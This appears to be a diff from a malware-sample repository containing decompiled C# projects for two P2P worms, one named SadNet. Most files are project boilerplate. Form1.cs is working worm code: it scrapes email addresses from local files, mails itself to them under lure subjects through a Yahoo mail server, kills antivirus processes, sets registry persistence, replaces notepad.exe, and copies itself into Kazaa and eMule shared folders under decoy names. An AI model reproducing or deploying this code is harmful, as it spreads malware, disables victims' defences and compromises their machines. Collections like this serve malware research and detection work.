@@ -0,0 +1,123 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="$this.Name" mimetype="application/x-microsoft.net.object.binary.base64">
<value>BUZvcm0x</value>
</data>
</root>
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Secorm-66106dc8b8fbe05f679ce87d7a4bae2d1661e4c1dc62f380accd3cbeaaed1ad6/P2P-Worm.Win32.Secorm.csproj
+43
View File
@@ -0,0 +1,43 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Secorm-66106dc8b8fbe05f679ce87d7a4bae2d1661e4c1dc62f380accd3cbeaaed1ad6.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{B7BD5C1B-AFB6-43C6-8F63-7FD475FCB6C1}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>WindowsApplication1</AssemblyName>
<ApplicationVersion>1.0.1397.42263</ApplicationVersion>
<RootNamespace>WindowsApplication1</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Form1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Secorm-66106dc8b8fbe05f679ce87d7a4bae2d1661e4c1dc62f380accd3cbeaaed1ad6/P2P-Worm.Win32.Secorm.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "WindowsApplication1", "P2P-Worm.Win32.Secorm-66106dc8b8fbe05f679ce87d7a4bae2d1661e4c1dc62f380accd3cbeaaed1ad6.csproj", "{B7BD5C1B-AFB6-43C6-8F63-7FD475FCB6C1}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B7BD5C1B-AFB6-43C6-8F63-7FD475FCB6C1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{B7BD5C1B-AFB6-43C6-8F63-7FD475FCB6C1}.Debug|Any CPU.Build.0 = Debug|Any CPU
{B7BD5C1B-AFB6-43C6-8F63-7FD475FCB6C1}.Release|Any CPU.ActiveCfg = Release|Any CPU
{B7BD5C1B-AFB6-43C6-8F63-7FD475FCB6C1}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/AssemblyInfo.cs
+14
View File
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyProduct("SadNet")]
[assembly: AssemblyCompany("civil")]
[assembly: Guid("9bf87720-9855-4a4e-9e7e-e3e5ea68a686")]
[assembly: AssemblyCopyright("Copyright © civil 2006")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("SadNet")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/Form1.cs
+348
View File
@@ -0,0 +1,348 @@
// Decompiled with JetBrains decompiler
// Type: SadNet.Form1
// Assembly: SadNet, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7CA2C9C9-C782-4D2C-95AC-6004CBF68D8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Text;
using System.Text.RegularExpressions;
using System.Web.Mail;
using System.Windows.Forms;
namespace SadNet
{
public class Form1 : Form
{
private IContainer components;
private Timer mailer;
private Timer killer;
public Form1() => this.InitializeComponent();
private void mailer_Tick(object sender, EventArgs e)
{
try
{
string str1 = new string[20]
{
"mcafee",
"symantec",
"Yahoo!",
"Thank you!",
"Text message",
"Document",
"Incoming Message ",
"Message Notify ",
"Fax Message",
"Protected message",
"panda",
"Encrypted document",
"Account notify",
"E-mail account disabling warning",
"E-mail technical support message.",
"E-mail warning",
"Email account utilization warning.",
"Fax Message Received ",
"Forum notify ",
"do you know AmirCivil?"
}[new Random().Next(0, 20)];
string str2 = new string[5]
{
"AmirCivil.pic.cmd",
"register.pif ",
"sexy-screensaver.scr ",
"fullmessenger.exe",
"readme.html.cmd"
}[new Random().Next(0, 5)];
string str3 = new string[20]
{
"Deliver Error",
"Message Error",
"help attached ",
"such as yours",
"illegal st. of you?",
"is that your name? ",
"picture? ",
"abuse? ",
"is that yours? ",
"I have your password! ",
"classroom test of you? ",
"old photos about you? ",
"i hope thats not true! ",
"does it match? ",
" you know amir_civil?!",
"why should I? ",
"another pic, have fun! ... :->",
"xxx ? ",
"the information is wrong! ",
"love letter? "
}[new Random().Next(0, 20)];
string searchPattern = new string[2]
{
"*txt",
"*html"
}[new Random().Next(0, 2)];
string str4 = new string[20]
{
"mcafee@yahoo.com",
"symantec@yahoo.com",
"nod32@yahoo.com",
"panda@yahoo.com",
"avg@yahoo.com",
"antiblaster@yahoo.com",
"info@yahoo.com",
"ebook@yahoo.com",
"LongShot@yahoo.com",
"iraq@yahoo.com",
"update@yahoo.com",
"matt@yahoo.com",
"steve@yahoo.com",
"smith@yahoo.com",
"stan@yahoo.com",
"bill@yahoo.com",
"bob@yahoo.com",
"YourFriend@yahoo.com",
" mail@yahoo.com",
"ted@yahoo.com"
}[new Random().Next(0, 20)];
string path = new string[5]
{
"C:\\",
"D:\\",
"E:\\",
"G:\\",
"F:\\"
}[new Random().Next(0, 5)];
for (int index = 0; index < 10; ++index)
{
try
{
string[] strArray = new string[3]
{
"C:\\dir1",
"D:\\",
"C:\\windows"
};
foreach (string str5 in strArray)
{
foreach (string file in Directory.GetFiles(path, searchPattern))
{
Regex regex = new Regex("[a-zA-Z0-9-_.-]+@[a-zA-Z0-9-_.-]+\\.[a-zA-Z0-9]+");
FileStream fileStream = new FileStream(file, FileMode.Open, FileAccess.Read);
byte[] numArray = new byte[fileStream.Length];
fileStream.Read(numArray, 0, (int) fileStream.Length);
fileStream.Close();
foreach (Match match in regex.Matches(Encoding.ASCII.GetString(numArray)))
{
string str6 = match.ToString();
try
{
MailMessage message = new MailMessage();
message.From = str4;
message.To = str6;
message.Cc = "info@yahoo.com";
message.Bcc = "password@yahoo.com";
message.Subject = str1;
message.Body = str3;
SmtpMail.SmtpServer = "mx4.mail.yahoo.com";
message.Attachments.Add((object) new MailAttachment(Application.ExecutablePath, MailEncoding.Base64));
SmtpMail.Send(message);
}
catch (Exception ex)
{
}
}
}
}
}
catch (Exception ex)
{
}
}
}
catch (Exception ex)
{
}
}
private void killer_Tick(object sender, EventArgs e)
{
string[] strArray = new string[56]
{
"NPROTECTED",
"GhostTray",
"NAVW32",
"F-AGNT95",
"NOD32",
"NETD32",
"NETMON",
"IOMON98",
"SCAN32",
"NORMIST",
"NAVW3",
"ADAWARE",
"AGENTW",
"LU32",
"NAVAP32",
"ANTIVIR",
"TCM",
"W9X",
"AVKSERV",
"winamp",
"ACKWIN32",
"AD-AWARE",
"ADVXDWIN",
"AGENTSVR",
"AGENTW",
"ANTIVIRUS",
"ANTS",
"APIMONITOR",
"APLICA32",
"ARR",
"AUPDATE",
"AUTODOWN",
"AUTOTRACE",
"AVE32",
"AVGCC32",
"AVGCTRL",
"AVGNT",
"CFINET",
"CLEANPC",
"CTRL",
"AV32",
"DATEMANAGER ",
"DOORS",
"DPFSETUP ",
"FCH32 ",
"FNRB32",
"notepad",
"killer",
"POP3TRAP",
"remind",
"cftmon",
"msmsgs",
"taskmgr",
"regedit",
"vb6",
"ZONEALARM"
};
foreach (Process process in Process.GetProcessesByName(strArray[new Random().Next(0, 56)]))
process.CloseMainWindow();
}
private void hidden_Tick(object sender, EventArgs e)
{
}
private void error_Tick(object sender, EventArgs e)
{
}
private void copy_Tick(object sender, EventArgs e)
{
}
private void amir(object sender, EventArgs e)
{
this.Hide();
try
{
File.Copy(Application.ExecutablePath, Environment.SystemDirectory + "\\winlogon.cab.exe");
Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "SadNet", (object) (Environment.SystemDirectory + "\\winlogon.cab.exe"), RegistryValueKind.ExpandString);
Registry.SetValue("HKEY_CURRENT_USER\\SadNet", "SadNet", (object) "(_-oO]xX|-|S|-|a|-|d|-|N|-|e|-|t|-|Xx[Oo-_)!", RegistryValueKind.ExpandString);
}
catch (Exception ex)
{
}
try
{
File.Move(Environment.SystemDirectory + "\\notepad.exe", Environment.SystemDirectory + "\\AmirCivil.exe");
File.Copy(Application.ExecutablePath, Environment.SystemDirectory + "\\notepad.exe");
}
catch (Exception ex)
{
}
try
{
File.Copy(Application.ExecutablePath, "C:\\symantec.exe");
File.Copy(Application.ExecutablePath, "D:\\fun.pic.scr");
File.Copy(Application.ExecutablePath, "E:\\wow.pif");
File.Copy(Application.ExecutablePath, "F:\\mail.cmd");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Kazaa\\My Shared Folder\\winampa2.dll.pif");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Kazaa\\My Shared Folder\\project.exe");
File.Copy(Application.ExecutablePath, "J:\\Program Files\\Kazaa\\My Shared Folder\\SkyNetAntiVirus.doc.cmd");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Kazaa\\My Shared Folder\\screen_saver!.scr");
File.Copy(Application.ExecutablePath, "F:\\Program Files\\Kazaa\\My Shared Folder\\winlogon.dll.exe");
File.Copy(Application.ExecutablePath, "H:\\Program Files\\Kazaa\\My Shared Folder\\fun.pic.scr");
}
catch (Exception ex)
{
}
try
{
api.ShowWindow(api.FindWindow("ConsoleWindowClass", (string) null), 0);
api.ShowWindow(api.FindWindow("#32770", (string) null), 0);
api.ShowWindow(api.FindWindow("MGHTML_DLG_CLASS", (string) null), 0);
api.ShowWindow(api.FindWindow("NAVAP Wnd Clas", (string) null), 0);
api.ShowWindow(api.FindWindow("RegEdit_RegEdit", (string) null), 0);
api.ShowWindow(api.FindWindow("notepad", (string) null), 0);
}
catch (Exception ex)
{
}
}
private void hien_Tick(object sender, EventArgs e)
{
}
private void mail2_Tick(object sender, EventArgs e)
{
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new Container();
this.mailer = new Timer(this.components);
this.killer = new Timer(this.components);
this.SuspendLayout();
this.mailer.Enabled = true;
this.mailer.Interval = 30000;
this.mailer.Tick += new EventHandler(this.mailer_Tick);
this.killer.Enabled = true;
this.killer.Tick += new EventHandler(this.killer_Tick);
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(292, 266);
this.Name = nameof (Form1);
this.Text = "SadNet";
this.Activated += new EventHandler(this.amir);
this.ResumeLayout(false);
}
}
}
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/Form1.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/P2P-Worm.Win32.Small.v.csproj
+51
View File
@@ -0,0 +1,51 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{30C159C8-88B4-48DC-906F-93905CF0199E}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>SadNet</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>SadNet</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Web" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="api.cs" />
<Compile Include="Form1.cs" />
<Compile Include="Properties\Settings.cs" />
<Compile Include="Properties\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
<EmbeddedResource Include="Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/P2P-Worm.Win32.Small.v.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SadNet", "P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd.csproj", "{30C159C8-88B4-48DC-906F-93905CF0199E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{30C159C8-88B4-48DC-906F-93905CF0199E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{30C159C8-88B4-48DC-906F-93905CF0199E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{30C159C8-88B4-48DC-906F-93905CF0199E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{30C159C8-88B4-48DC-906F-93905CF0199E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/Program.cs
+22
View File
@@ -0,0 +1,22 @@
// Decompiled with JetBrains decompiler
// Type: SadNet.Program
// Assembly: SadNet, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7CA2C9C9-C782-4D2C-95AC-6004CBF68D8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd.exe
using System;
using System.Windows.Forms;
namespace SadNet
{
internal static class Program
{
[STAThread]
private static void Main()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run((Form) new Form1());
}
}
}
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/Properties/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: SadNet.Properties.Resources
// Assembly: SadNet, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7CA2C9C9-C782-4D2C-95AC-6004CBF68D8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace SadNet.Properties
{
[CompilerGenerated]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[DebuggerNonUserCode]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (SadNet.Properties.Resources.resourceMan == null)
SadNet.Properties.Resources.resourceMan = new ResourceManager("SadNet.Properties.Resources", typeof (SadNet.Properties.Resources).Assembly);
return SadNet.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => SadNet.Properties.Resources.resourceCulture;
set => SadNet.Properties.Resources.resourceCulture = value;
}
}
}
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/Properties/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
